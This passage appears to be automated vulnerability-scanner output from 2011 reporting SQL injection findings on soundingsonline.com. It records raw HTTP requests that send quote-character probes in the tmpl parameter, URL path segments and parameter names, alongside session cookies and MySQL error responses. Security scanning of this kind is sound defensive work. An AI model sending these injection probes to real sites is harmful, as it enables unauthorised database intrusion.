GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/mailto/?tmpl=component'&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/mailto/?tmpl=component''&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component'/yvcomment/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component''/yvcomment/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/yvcomment'/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/yvcomment''/ HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/component/yvcomment/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/yvcomment/?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/yvcomment/?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/contact-us
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /contact-us?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /contact-us?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/destinations
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/destinations?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/destinations?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/in-depth
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/in-depth?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/in-depth?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/justyesterday
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /features/justyesterday?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /features/justyesterday?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
